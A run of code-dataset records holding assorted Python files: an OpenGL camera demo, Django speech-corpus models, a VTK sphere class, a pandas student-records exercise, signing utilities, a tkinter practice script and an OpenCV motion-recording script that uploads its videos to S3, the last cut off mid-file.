yaw+=360\r\n elif yaw >= 360: yaw-=360\r\n if look_up and pitch > -90:\r\n pitch -= 2\r\n glRotate(-yaw,0,1,0)\r\n glRotate(-2,1,0,0)\r\n glRotate(yaw,0,1,0)\r\n if look_down and pitch < 90:\r\n pitch += 2\r\n glRotate(-yaw,0,1,0)\r\n glRotate(2,1,0,0)\r\n glRotate(yaw,0,1,0)\r\n if look_left:\r\n yaw -= 2\r\n glRotate(-2,0,1,0)\r\n if look_right:\r\n yaw += 2\r\n glRotate(2,0,1,0)\r\n print(pitch, yaw)\r\n\r\ndef draw():\r\n clock.tick(60)\r\n pygame.display.flip()\r\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\r\n\r\ncoords = (0, -1, -2) \r\nnew_cube = Cube(coords, verticies, False, (0,1,1))\r\nanother_cube = Cube(coords, verticies)\r\n\r\ncube_right = Cube((2,-1,0), verticies, False, (0,0,1))\r\ncube_left = Cube((-2,-1,0), verticies, False, (1,0,0))\r\ncube_behind = Cube((0,-1,2), verticies)\r\n\r\nwhile True:\r\n events()\r\n skybox()\r\n ground()\r\n new_cube.draw()\r\n another_cube.wireframe()\r\n cube_right.draw()\r\n cube_left.draw()\r\n cube_behind.draw()\r\n rotate_camera()\r\n draw()\r\n","sub_path":"run v2.py","file_name":"run v2.py","file_ext":"py","file_size_in_byte":4473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"431394113","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport math\nimport decimal\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom django.core.exceptions import ValidationError\nfrom 
django.db import models\nfrom django.utils import timezone\nfrom django.contrib.contenttypes.fields import GenericForeignKey,\\\n GenericRelation\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom django.contrib.postgres.indexes import BrinIndex\nfrom django.contrib.postgres.fields import JSONField\n\nfrom django.contrib.auth.models import User\nfrom corpus.base_settings import LANGUAGES, LANGUAGE_CODE, DIALECTS\n\nfrom django.contrib.postgres.fields import JSONField\n\nfrom uuid import uuid4\nimport os\nimport hashlib\n\nfrom django.utils.safestring import mark_safe\n\n\ndef get_md5_hexdigest_of_file(file_object):\n hash_md5 = hashlib.md5()\n close_file = False\n change_mode = False\n try:\n if file_object.closed:\n file_object.open('rb')\n close_file = True\n\n for chunk in file_object.chunks():\n hash_md5.update(chunk)\n\n if close_file:\n file_object.close()\n\n result = hash_md5.hexdigest()\n del hash_md5\n return result\n\n except IOError:\n del hash_md5\n return None\n\n\ndef upload_directory(instance, filename):\n d = timezone.now()\n i = str(uuid4())\n return '{0}/{1}.{2}'.format(\n d.strftime('%Y/%m/%d/%H/%M'),\n i,\n filename.split('.')[-1])\n\n\nclass RecordingQualityControl(models.Model):\n good = models.PositiveIntegerField(\n default=0,\n help_text='Indicates the object is good. Can be any interger >= 0.')\n bad = models.PositiveIntegerField(\n default=0,\n help_text='Indicates the object is bad. Can be any interger >= 0.')\n approved = models.BooleanField(\n default=False,\n help_text='Approved indicates that the object is suitable for use.')\n approved_by = models.ForeignKey(\n User,\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n help_text='User that approved the object. Should be a user ID.')\n trash = models.BooleanField(\n default=False,\n help_text='Flag for deletion.')\n star = models.PositiveIntegerField(\n default=0,\n help_text='Stars are to indicate an object is amazing. This is a positive\\\n interger field so we can, for example, do a 5 star rating system.')\n follow_up = models.BooleanField(\n default=False,\n help_text='Flag an item for follow up later.')\n noise = models.BooleanField(\n default=False,\n help_text='Check if an item has noise but is still intelligible.')\n content_type = models.ForeignKey(\n ContentType, on_delete=models.SET_NULL, null=True,\n help_text='Model to which this QualityControl refers. This should be \\\n the content type ID. 
Implemented types are Recordings (id=8),\\\n Sentences (id=10), Transcription Segments (id=24).', blank=True, default=None)\n object_id = models.PositiveIntegerField(null=True, blank=True, default=None)\n content_object = GenericForeignKey('content_type', 'object_id')\n updated = models.DateTimeField(auto_now=True)\n person = models.ForeignKey(\n 'people.Person',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n help_text=\"ID of person associated with this QualityControl object.\\\n For Token Authenticated API calls, passing the string 'self' instead\\\n of an Integer will associate the person of the Token with this QC \\\n object.\")\n\n # Move to Recording QC\n recording = models.ForeignKey(\n 'corpus.Recording',\n related_name='quality_control',\n null=True,\n on_delete=models.CASCADE,)\n\n notes = models.TextField(\n blank=True,\n null=True,\n help_text=\"Field for providing extra information about a review.\")\n\n machine = models.BooleanField(\n default=False,\n help_text='Boolean to indicate if a machine made the review.')\n source = models.ForeignKey(\n 'Source',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n help_text='Used to identify machines.')\n\n pronunciation = models.JSONField(\n blank=True,\n default=None,\n null=True\n )\n\n class Meta:\n unique_together = ((\"object_id\", \"content_type\", \"person\"),)\n indexes = [\n # models.Index(fields=['object_id', 'content_type', ]),\n models.Index(fields=['trash', ]),\n models.Index(fields=['approved', ]),\n models.Index(fields=['good', ]),\n models.Index(fields=['bad', ]),\n # models.Index(fields=['first_name'], name='first_name_idx'),\n ]\n\n def clear(self):\n self.good = 0\n self.bad = 0\n self.approved = False\n self.approved_by = None\n\n def calculate_score(self):\n \"\"\"Listener/reviewer score for this review - the closer to the mean,\n the higher the score. \"\"\"\n\n if self.recording:\n qc = RecordingQualityControl.objects.filter(\n recording__pk=self.recording.pk)\n else:\n return 0\n\n avg = qc.aggregate(\n value=models.Avg(models.F('good') - models.F('bad')))\n\n # normalise to between -1 and 1 - TODO check this is correct\n avg = max(-1, min(1, avg['value'] or 0))\n vote = max(-1, min(1, self.good - self.bad))\n\n return 1 - decimal.Decimal(abs(vote - avg)) / 2\n\n def __str__(self):\n try:\n return u'Recording QC: {0}'.format(self.recording.pk)\n except:\n return u'old sentence?'\n\n def save(self, *args, **kwargs):\n self.recording.save()\n return super().save(*args, **kwargs)\n\n\nclass SentenceQualityControl(models.Model):\n\n good = models.PositiveIntegerField(\n default=0,\n help_text='Indicates the object is good. Can be any interger >= 0.')\n bad = models.PositiveIntegerField(\n default=0,\n help_text='Indicates the object is bad. Can be any interger >= 0.')\n approved = models.BooleanField(\n default=False,\n help_text='Approved indicates that the object is suitable for use.')\n approved_by = models.ForeignKey(\n User, null=True, blank=True,\n on_delete=models.SET_NULL,\n help_text='User that approved the object. 
Should be a user ID.')\n    trash = models.BooleanField(\n        default=False,\n        help_text='Flag for deletion.')\n\n    updated = models.DateTimeField(auto_now=True)\n    person = models.ForeignKey(\n        'people.Person', null=True, blank=True, on_delete=models.SET_NULL)\n\n    sentence = models.ForeignKey(\n        'corpus.Sentence',\n        related_name='quality_control',\n        null=True,\n        on_delete=models.SET_NULL)\n\n    notes = models.TextField(\n        blank=True,\n        null=True,\n        help_text=\"Field for providing extra information about a review.\")\n\n    machine = models.BooleanField(\n        default=False,\n        help_text='Boolean to indicate if a machine made the review.')\n\n    source = models.ForeignKey(\n        'Source',\n        null=True,\n        blank=True,\n        on_delete=models.SET_NULL,\n        help_text='Used to identify machines.')\n\n    class Meta:\n        unique_together = ((\"sentence\", \"person\"),)\n        # indexes = [\n        #     models.Index(fields=['object_id', 'content_type', ]),\n        #     # models.Index(fields=['first_name'], name='first_name_idx'),\n        # ]\n\n    def clear(self):\n        self.good = 0\n        self.bad = 0\n        self.approved = False\n        self.approved_by = None\n\n    def random_foo(self):\n        print(\"Random, as\")\n\n    def __str__(self):\n        try:\n            return u'Sentence QC: {0}'.format(self.sentence.pk)\n        except:\n            return 'migration error?'\n\nclass Source(models.Model):\n    SOURCE_TYPES = (\n        ('W', 'Website'),\n        ('A', 'Article'),\n        ('B', 'Book'),\n        ('I', 'Interview'),\n        ('S', 'Self'),\n        ('D', 'Document'),\n        ('M', 'Machine'),\n    )\n\n    description = models.TextField(\n        help_text='Any extra info about the source',\n        null=True,\n        blank=True)\n    author = models.CharField(\n        help_text=\"Author's name\",\n        max_length=128,\n        null=True,\n        blank=True)\n    source_type = models.CharField(\n        max_length=1,\n        choices=SOURCE_TYPES,\n        null=True,\n        blank=True,\n        help_text='Source type is a single character.\\\n        Valid source types include {0}.'.format(\n            \", \".join(\n                [\"'{0}' ({1})\".format(i[0], i[1]) for i in SOURCE_TYPES]))\n    )\n    source_name = models.CharField(\n        help_text=\"Name of the source\",\n        max_length=256,\n        null=True,\n        blank=True)\n    added_by = models.ForeignKey(\n        'people.Person',\n        null=True,\n        blank=True,\n        on_delete=models.SET_NULL)\n    source_url = models.URLField(\n        null=True,\n        blank=True,\n        help_text=\"URL for the source (e.g. 
a website or API endpoint).\\\n        This field can be None.\")\n\n    class Meta:\n        verbose_name = 'Source'\n        verbose_name_plural = 'Sources'\n        unique_together = (\n            (\"source_name\", \"source_type\", \"author\", 'source_url'),)\n\n    def __str__(self):\n        return \"{0} by {1}\".format(self.source_name, self.author)\n\nclass Sentence(models.Model):\n    text = models.CharField(\n        help_text='The sentence to be spoken.',\n        max_length=1024, unique=True\n    )\n\n    language = models.CharField(\n        choices=LANGUAGES,\n        max_length=16,\n        default=LANGUAGE_CODE\n    )\n    dialect = models.CharField(\n        choices=DIALECTS,\n        max_length=8,\n        null=True,\n        blank=True)\n\n    # quality_control = GenericRelation(\n    #     QualityControl,\n    #     related_query_name='sentence'\n    # )\n\n    updated = models.DateTimeField(auto_now=True)\n    source = models.ForeignKey(\n        'Source',\n        null=True,\n        blank=True,\n        on_delete=models.SET_NULL)\n\n    level = models.PositiveIntegerField(\n        default=0,\n        blank=True,\n        help_text=_(\"An arbitrary level to help us label\\\n            the language level of a sentence.\\\n            0 is no level, 1 is beginning, and any value\\\n            higher than 1 is gradually harder.\")\n    )\n\n    class Meta:\n        verbose_name = 'Sentence'\n        verbose_name_plural = 'Sentences'\n        indexes = [\n            # models.Index(fields=['quality_control'])\n        ]\n\n    def clean(self):\n        if len(self.text) > 124:\n            raise ValidationError('Sentence too long')\n\n        if Sentence.objects.exclude(pk=self.pk).filter(text=self.text):\n            raise ValidationError('Duplicate sentence')\n\n    def __str__(self):\n        return self.text\n\n    def get_features(self):\n        import features\n        f = features.import_finder(self.language)\n        return f(self.text)\n\n\nclass Recording(models.Model):\n    person = models.ForeignKey(\n        'people.Person',\n        null=True,\n        blank=True,\n        on_delete=models.SET_NULL\n    )\n\n    sentence = models.ForeignKey(\n        'Sentence',\n        null=True, blank=True,\n        on_delete=models.SET_NULL\n    )\n\n    # quality_control = GenericRelation(\n    #     QualityControl,\n    #     related_query_name='recording'\n    # )\n\n    source = models.ForeignKey(\n        'Source',\n        null=True,\n        blank=True,\n        on_delete=models.SET_NULL)\n\n    language = models.CharField(\n        verbose_name=_('language'),\n        choices=LANGUAGES,\n        max_length=16,\n        default=LANGUAGE_CODE,\n        blank=True,\n        help_text='Language for a particular recording')\n\n    # Dialect? 
Add field so we can flag a dialect for a recording.\n dialect = models.CharField(\n choices=DIALECTS,\n max_length=8,\n null=True,\n blank=True,\n verbose_name=_('dialect'))\n\n audio_file = models.FileField(upload_to=upload_directory)\n audio_file_md5 = models.CharField(\n max_length=32, editable=False, default=None, null=True)\n\n created = models.DateTimeField(auto_now_add=True, editable=False)\n updated = models.DateTimeField(auto_now=True)\n sentence_text = models.CharField(max_length=1024, blank=True, null=True)\n duration = models.FloatField(default=0, blank=True)\n\n audio_file_aac = models.FileField(\n upload_to=upload_directory, null=True, blank=True)\n\n audio_file_wav = models.FileField(\n upload_to=upload_directory, null=True, blank=True)\n audio_file_wav_md5 = models.CharField(\n max_length=32, editable=False, default=None, null=True)\n\n user_agent = models.CharField(\n max_length=512, blank=True, null=True)\n\n private = models.BooleanField(\n help_text='Set to prevent public from accessing this recording.',\n default=False)\n\n dataset = models.ForeignKey(\n 'DataSet',\n null=True,\n blank=True,\n on_delete=models.SET_NULL\n )\n\n class Meta:\n verbose_name = 'Recording'\n verbose_name_plural = 'Recordings'\n unique_together = ((\"person\", \"sentence\"),)\n indexes = [\n BrinIndex(fields=['created']),\n models.Index(fields=['-updated']),\n # models.Index(fields=['quality_control'])\n ]\n\n def __str__(self):\n sentence_text = self.get_sentence_text()\n sentence_text = sentence_text[0:64]\n try:\n return f\"{sentence_text} by {self.get_person_name()}\"\n except:\n return f\"{sentence_text}\"\n\n\n def audio_file_admin(self):\n url = self.get_recording_file_url()\n return mark_safe(\"\"\"\n %s\"\"\" % (url, url, url))\n\n def get_recording_file_url(self, request=None):\n from django.urls import reverse\n from django.contrib.sites.models import Site\n \n if request:\n domain = request.META['HTTP_HOST']\n else:\n current_site = Site.objects.get_current()\n domain = current_site.domain\n\n try:\n url = \"https://{1}{0}\".format(\n reverse('corpus:recording_file', kwargs={'pk': self.pk}),\n domain)\n except:\n url = \"\"\n return url\n\n def get_recording_file_name(self):\n parts = self.audio_file.name.split('.')\n parts.pop()\n return os.path.basename('.'.join(parts))\n\n def get_sentence_text(self):\n if self.sentence_text:\n return self.sentence_text\n elif self.sentence:\n return self.sentence.text\n else:\n return 'None' # Some reasone making this _() causes error in admin.\n\n def get_person_name(self):\n if self.person:\n return self.person.full_name\n else:\n return _(u'None')\n\n def calculate_score(self):\n \"\"\"Score awarded for uploading this recording. \"\"\"\n\n approved = self.quality_control \\\n .filter(approved=True)\n\n if approved.count() >= 1:\n return 1\n\n net_votes = self.quality_control \\\n .aggregate(value=models.Sum(models.F('good') - models.F('bad')))\n\n net_votes = decimal.Decimal(net_votes['value'] or 0)\n damper = 4\n return max(0, 1 - math.exp(-(net_votes + 1) / damper))\n\n def save(self, *args, **kwargs):\n if self.audio_file is not None and self.audio_file_md5 is None:\n self.audio_file_md5 = get_md5_hexdigest_of_file(self.audio_file)\n\n # I really don't understand something fundamendal here! 
why does\n        # if self.audio_file_wav is not None: not work!\n        try:\n            if self.audio_file_wav is not None:\n                if self.audio_file_wav_md5 is None:\n                    self.audio_file_wav_md5 = \\\n                        get_md5_hexdigest_of_file(self.audio_file_wav)\n        except:\n            pass\n\n        super(Recording, self).save(*args, **kwargs)\n\n\nclass Text(models.Model):\n    primary_language = models.CharField(\n        verbose_name=_('primary language'),\n        choices=LANGUAGES,\n        max_length=16,\n        default=LANGUAGE_CODE\n    )\n    secondary_language = models.CharField(\n        verbose_name=_('secondary language'),\n        choices=LANGUAGES,\n        max_length=16,\n        blank=True,\n        null=True,\n    )\n    dialect = models.CharField(\n        choices=DIALECTS,\n        max_length=8,\n        null=True,\n        blank=True)\n\n    copyright = JSONField(null=True, blank=True)\n    updated = models.DateTimeField(verbose_name=_('updated'), auto_now=True)\n    source = models.ForeignKey(\n        'Source',\n        null=True, on_delete=models.SET_NULL,\n        verbose_name=_('source'))\n\n    notes = models.TextField(\n        blank=True,\n        null=True,\n        help_text='Any miscellaneous observations about the text'\n    )\n    description = models.TextField(\n        blank=True,\n        default='',\n        help_text='A description of the contents of this text')\n\n    config = JSONField(\n        null=True, blank=True,\n        help_text='A JSON object with any necessary configuration parameters.')\n\n    original_file = models.FileField(\n        upload_to=upload_directory,\n        help_text=_('This can be any type of file.')\n    )\n\n    original_file_md5 = models.CharField(\n        max_length=32,\n        editable=False,\n        default=None, null=True)\n\n    cleaned_file = models.FileField(\n        null=True,\n        default=None,\n        blank=True,\n        upload_to=upload_directory,\n        help_text=_('This should be a .txt file with utf8 encoding.')\n    )\n    cleaned_file_md5 = models.CharField(\n        max_length=32, editable=False, default=None, null=True)\n\n    class Meta:\n        verbose_name = _('text')\n        verbose_name_plural = _('texts')\n        # unique_together = ((\"original_file_md5\", \"content_type\", \"person\"),)\n\n    def __str__(self):\n        return str(self.original_file)\n\n    def save(self, *args, **kwargs):\n        if self.original_file_md5 is None:\n            try:\n                self.original_file_md5 = \\\n                    get_md5_hexdigest_of_file(self.original_file)\n            except ValueError:\n                pass\n\n        if self.cleaned_file_md5 is None:\n            try:\n                self.cleaned_file_md5 = \\\n                    get_md5_hexdigest_of_file(self.cleaned_file)\n            except ValueError:\n                pass\n\n        super(Text, self).save(*args, **kwargs)\n\n\nclass RecordingMetadata(models.Model):\n    recording = models.OneToOneField(\n        'corpus.Recording',\n        related_name='metadata',\n        on_delete=models.CASCADE,\n        unique=True\n    )\n\n    metadata = models.JSONField(\n        null=True,\n        blank=True\n    )\n\n    pronunciation = models.JSONField(\n        null=True, blank=True)\n\n    updated = models.DateTimeField(auto_now=True)\n    created = models.DateTimeField(auto_now_add=True)\n\n\nclass DataSet(models.Model):\n    SET_TYPES = (\n        ('G', 'Golden'),\n        ('H', 'Holdout'),\n        ('T', 'Test'),\n        ('D', 'Development'),\n    )\n    PURPOSE_TYPES = (\n        ('PRN', 'Pronunciation'),\n        ('TTS', 'Synthesis'),\n        ('STT', 'Speech Recognition'),\n    )\n    name = models.CharField(\n        help_text=\"Name for the dataset\",\n        max_length=64,\n    )\n    description = models.TextField(\n        blank=True, null=True\n    )\n    purpose = models.CharField(\n        max_length=3,\n        choices=PURPOSE_TYPES,\n    )\n    set_type = models.CharField(\n        max_length=1,\n        choices=SET_TYPES,\n    )\n    metadata = models.JSONField(\n        null=True,\n        blank=True\n    )\n\n    def __str__(self):\n        return 
self.name\n","sub_path":"corpora/corpus/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":20381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"435100565","text":"\"\"\"\r\nsphere.py -- \r\n \r\nIt sets a sphere's geometric properties. \r\n \r\nDate of creation: 2007-03-17 \r\n \r\nCopyright Robotics and Automation Group, Pontificia Universidad Javeriana - Cali. \r\n Freddy Naranjo Perez, fnaranjo@puj.edu.co \r\n Antonio Alejandro Matta Gomez amatta@puj.edu.co \r\n Julian David Colorado, jdcolorado@puj.edu.co \r\n Juan Camilo Acosta Mejia, jcacosta@puj.edu.co \r\n \r\nSee the file \"license.terms\" for information on usage and redistribution of this file, and for a \r\nDISCLAIMER OF ALL WARRANTIES.\r\n\"\"\"\r\n\r\nimport vtk\r\nfrom vtk.util.colors import *\r\n\r\nclass Sphere:\r\n def __init__( self, ren, geomdim, posorient, lighting, color ):\r\n \"\"\" Inits a sphere's 3d object and its associated color and lighting\"\"\"\r\n \r\n sphere = vtk.vtkSphere()\r\n sphere.SetCenter(0, 0, 0)\r\n sphere.SetRadius(geomdim)\r\n \r\n # The sample function generates a distance function from the implicit\r\n # function (which in this case is the sphereHole). This is then contoured to\r\n # get a polygonal surface.\r\n theSphereSample = vtk.vtkSampleFunction()\r\n theSphereSample.SetImplicitFunction(sphere)\r\n theSphereSample.SetModelBounds(-0.08, 0.08, -0.08, 0.08, -0.08, 0.08)\r\n theSphereSample.SetSampleDimensions(60, 60, 60)\r\n theSphereSample.ComputeNormalsOn()\r\n \r\n #vtk.vtkContourFilter applied in order to get a polygonal surface.\r\n theSphereSurface = vtk.vtkContourFilter()\r\n theSphereSurface.SetInputConnection(theSphereSample.GetOutputPort())\r\n theSphereSurface.SetValue(0, 0.0)\r\n\r\n #Decimation algorithm applied in order to optimaze polygonal surface.\r\n deci = vtk.vtkDecimatePro()\r\n deci.SetInputConnection(theSphereSurface.GetOutputPort())\r\n deci.SetTargetReduction(0.1)\r\n deci.PreserveTopologyOn()\r\n\r\n #Smoothing applied in order to get a better surface.\r\n smooth= vtk.vtkSmoothPolyDataFilter()\r\n smooth.SetInputConnection(deci.GetOutputPort())\r\n smooth.SetNumberOfIterations(20)\r\n\r\n #Normal's computation.\r\n normals = vtk.vtkPolyDataNormals()\r\n normals.SetInputConnection(smooth.GetOutputPort())\r\n normals.FlipNormalsOn()\r\n\r\n #Normal's passed to the poly data mapper.\r\n SphereMapper = vtk.vtkPolyDataMapper()\r\n SphereMapper.SetInputConnection(normals.GetOutputPort())\r\n SphereMapper.ScalarVisibilityOff()\r\n\r\n self.sphereActor = vtk.vtkActor()\r\n self.sphereActor.SetMapper(SphereMapper)\r\n self.sphereActor.GetProperty().SetInterpolationToGouraud()\r\n self.sphereActor.GetProperty().SetColor(color)\r\n self.sphereActor.GetProperty().SetSpecular(.3)\r\n self.sphereActor.GetProperty().SetSpecularPower(30)\r\n self.sphereActor.SetPosition( posorient[0], posorient[1], posorient[2] )\r\n self.sphereActor.SetOrientation( posorient[3], posorient[4], posorient[5] )\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n ","sub_path":" batsim --username jdcolorado11/graphengine/sphere.py","file_name":"sphere.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"228395491","text":"#Create a program to take as input 5 student records in the following format:\n#**roll_num** | **name** | **age** | **marks**(out of 100)\n#And then output the records in a tabular 
form with class average, \n# class highest and class lowest at end in the following format.\n\n#Use dictionaries (list of dictionaries in exact)\n#Insert atleast 5 records\n#Input must be user-given (Optional) validate the user input, i.e marks aren't\n# greater 100 and other such validations you think there might be\nimport pandas as pd\nrolln = list()\nname = list()\nage = list()\nmarks = list()\nn_range = int(input('How many records you want to save: '))\nfor a in range(n_range):\n student_data = input('Enter your roll number,name,age and marks( | separated): ')\n r,n,a,m = student_data.split('|')\n marks.append(int(m))\n rolln.append(int(r))\n name.append(n)\n age.append(a)\n\ndata = { 'ROLLN':rolln , 'NAME':name , 'AGE':age , 'MARKS':marks }\npd.DataFrame(data)\n\nb = max(data['MARKS'])\na = data['MARKS'].index(b)\npd.DataFrame({'Class Highest':[data['ROLLN'][a],data['NAME'][a],data['AGE'][a],data['MARKS'][a]]})\n\nb = min(data['MARKS'])\na = data['MARKS'].index(b)\npd.DataFrame({'Class Lowest':[data['ROLLN'][a],data['NAME'][a],data['AGE'][a],data['MARKS'][a]]})\n\nfor a in data['MARKS']:\n if a>40 and a<50:\n a = data['MARKS'].index(b)\n print(pd.DataFrame({'Class Average':[data['ROLLN'][a],data['NAME'][a],data['AGE'][a],data['MARKS'][a]]}))","sub_path":"week_1/Assignment_Q2.py","file_name":"Assignment_Q2.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"642654115","text":"\n\n\nfrom lib.utils.mytime import UtilTime\nfrom lib.utils.exceptions import PubErrorCustom\nimport hashlib\nfrom lib.utils.log import logger\nfrom app.saas.config import *\n\ndef timeHandler(timeSpan,timeUnit):\n if timeUnit == 'y':\n return UtilTime().today.shift(years=timeSpan).timestamp\n elif timeUnit == 'm':\n return UtilTime().today.shift(months=timeSpan).timestamp\n elif timeUnit == 'd':\n return UtilTime().today.shift(days=timeSpan).timestamp\n elif timeUnit == 'h':\n return UtilTime().today.shift(hours=timeSpan).timestamp\n else:\n return timeUnit\n\n\n\ndef sortKeyStringForDict(data):\n s=\"\"\n for item in sorted({k: v for k, v in data.items() if v != \"\"}):\n s+=data[item]\n return s\n\ndef sha256hex(data):\n sha = hashlib.sha256()\n sha.update(data.encode())\n return sha.hexdigest()\n\ndef sha1hex(data):\n sha = hashlib.sha1()\n sha.update(data.encode())\n return sha.hexdigest()\n\ndef passwordhash(password,salt):\n return sha1hex(\"{}-{}-{}\".format(password,salt,AUTHKEY))\n\ndef signCheckForTx(signature, timestamp, eventId):\n\n if UtilTime().today.shift(seconds=-30).timestamp > int(timestamp):\n logger.info(\"请求timestamp已经超时!\")\n raise PubErrorCustom(\"拒绝访问!\")\n\n stringNew = sortKeyStringForDict(dict(\n token = TOKEN,\n timestamp=timestamp,\n eventId=eventId\n ))\n\n\n sign = sha256hex(stringNew)\n\n logger.info(\"{}----{}----{}\".format(stringNew,signature, sign))\n # if signature != sign:\n # logger.info(\"{}----{}\".format(signature,sign))\n # raise PubErrorCustom(\"签名错误!\")\n\n","sub_path":"app/saas/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"405519324","text":"\"\"\"\nThis project lets you try out Tkinter/Ttk and practice it!\n\nAuthors: David Mutchler, Vibha Alangar, Matt Boutell, Dave Fisher,\n Mark Hays, Amanda Stouder, Aaron Wilkin, their colleagues,\n and Joseph Conrad.\n\"\"\" # DONE: 1. 
PUT YOUR NAME IN THE ABOVE LINE.\n\nimport tkinter\nfrom tkinter import ttk\n\n\ndef main():\n \"\"\" Constructs a GUI with stuff on it. \"\"\"\n # -------------------------------------------------------------------------\n # DONE: 2. After reading and understanding the m1e module,\n # ** make a window that shows up. **\n # -------------------------------------------------------------------------\n window = tkinter.Tk()\n #window.mainloop()\n # -------------------------------------------------------------------------\n # DONE: 3. After reading and understanding the m2e module,\n # ** put a Frame on the window. **\n # -------------------------------------------------------------------------\n my_frame = ttk.Frame(window, relief=\"sunken\", padding=(20,20), borderwidth = 3)\n\n my_frame.grid()\n # -------------------------------------------------------------------------\n # DONE: 4. After reading and understanding the m2e module,\n # ** put a Button on the Frame. **\n # -------------------------------------------------------------------------\n my_button = ttk.Button(my_frame, text=\"Click Me\")\n my_button.grid()\n # -------------------------------------------------------------------------\n # DONE: 5. After reading and understanding the m3e module,\n # ** make your Button respond to a button-press **\n # ** by printing \"Hello\" on the Console. **\n # -------------------------------------------------------------------------\n my_button['command'] = lambda : print(\"Hello\")\n # -------------------------------------------------------------------------\n # DONE: 6. After reading and understanding the m4e module,\n # -- Put an Entry box on the Frame.\n # -- Put a second Button on the Frame.\n # -- Make this new Button, when pressed, print \"Hello\"\n # on the Console if the current string in the Entry box\n # is the string 'ok', but print \"Goodbye\" otherwise.\n # -------------------------------------------------------------------------\n def print_contents(contents):\n stuff = contents.get()\n if stuff == 'ok':\n print(\"Hello\")\n else:\n print(\"Goodbye\")\n\n my_entry = ttk.Entry(my_frame)\n my_entry.grid()\n\n get_button = ttk.Button(my_frame, text=\"get entry\")\n get_button['command'] = lambda: print_contents(my_entry)\n get_button.grid()\n\n # -------------------------------------------------------------------------\n # DONE: 7.\n # -- Put a second Entry on the Frame.\n # -- Put a third Button on the frame.\n # -- Make this new Button respond to a button-press as follows:\n #\n # Pressing this new Button causes the STRING that the user typed\n # in the FIRST Entry box to be printed N times on the Console,\n # where N is the INTEGER that the user typed\n # in the SECOND Entry box.\n #\n # If the user fails to enter an integer,\n # that is a \"user error\" -- do NOT deal with that.\n #\n # -------------------------------------------------------------------------\n ####################################################################\n # HINT:\n # You will need to obtain the INTEGER from the STRING\n # that the GET method returns.\n # Use the int function to do so, as in this example:\n # s = entry_box.get()\n # n = int(s)\n ####################################################################\n def print_N_times(entry1, entry2):\n stri = entry1.get()\n integer = int(entry2.get())\n\n for k in range(integer):\n print(stri)\n\n entry2.delete(0,len(entry2.get()))\n entry1.delete(0, len(entry1.get()))\n\n sec_entry = ttk.Entry(my_frame)\n sec_entry.grid()\n\n sec_button = 
ttk.Button(my_frame, text=\"Print string N times\")\n    sec_button['command'] = lambda: print_N_times(my_entry, sec_entry)\n    sec_button.grid()\n\n    # -------------------------------------------------------------------------\n    # DONE: 8. As time permits, do other interesting GUI things!\n    # -------------------------------------------------------------------------\n    radio_b = ttk.Radiobutton(my_frame, text=\"hello\")\n    radio_b.grid()\n    window.mainloop()\n\n\n# -----------------------------------------------------------------------------\n# Calls main to start the ball rolling.\n# -----------------------------------------------------------------------------\nmain()\n","sub_path":"src/m5_tkinter_practice.py","file_name":"m5_tkinter_practice.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"64959587","text":"import numpy as np\nimport cv2\nimport time\nimport autoupload\nimport glob, os\nimport boto3\nfrom botocore.exceptions import ClientError\nimport logging\ns3= boto3.client('s3')\n# haar_face_cascade = cv2.CascadeClassifier('/home/pi/project/opencvlb/data/haarcascades/haarcascade_frontalface_default.xml')\nhaar_face_cascade = cv2.CascadeClassifier('/home/pi/project/opencvlb/data/haarcascades/haarcascade_upperbody.xml')\n\nvideo = cv2.VideoCapture(0) \n\nfps =10 #video.get(cv2.CAP_PROP_FPS)\n#코덱 정의 및 videoWriter 개체 생성\nfourcc = cv2.VideoWriter_fourcc(*'mp4v')\nDetectCount=0\nFrameCount=0\ndelay =round(1000/fps)\nrecordtime= fps *5\n\n\ndef upload_file(file_name, bucket, object_name=None):\n    \"\"\"Upload a file to an S3 bucket\n\n    :param file_name: File to upload\n    :param bucket: Bucket to upload to\n    :param object_name: S3 object name. If not specified then file_name is used\n    :return: True if file was uploaded, else False\n    \"\"\"\n\n    # If S3 object_name was not specified, use file_name\n    if object_name is None:\n        object_name = 'public/'+file_name\n\n    # Upload the file\n    try:\n        s3.upload_file(file_name, bucket, object_name)\n    except ClientError as e:\n        logging.error(e)\n        return False\n    return True\n\n\ndef upload_main():\n\n    files = dict(video=[],_10KB=[],_1MB=[],_10MB=[])\n    bucket_name= 'rascctvfcc104c288914011a034d2bb441de7b742257-staging'\n\n    os.chdir(\"./video\")\n    for file in glob.glob(\"*.mp4\"):\n        files[\"_10MB\"].append(file)\n\n    for key,value in files.items():\n        for filename in value:\n            upload_file(filename,bucket_name)\n    os.chdir(\"..\")\n\n\nwhile True:\n\n    check, frame = video.read()\n    #frame= cv2.flip(frame,-1) # flip camera vertically\n    #print(frame)\n\n    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n    body = haar_face_cascade.detectMultiScale(gray,scaleFactor=1.1,minNeighbors=5, minSize=(70, 70));\n    for (x, y, w, h) in body:\n        cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 0, 255), 3)\n        DetectCount+=1\n        FrameCount =0\n    \n    if DetectCount == 1:\n        save_name = time.strftime(\"video/%Y-%m-%d-%H시%M분%S초.mp4\");\n        out = cv2.VideoWriter(save_name ,fourcc, fps, 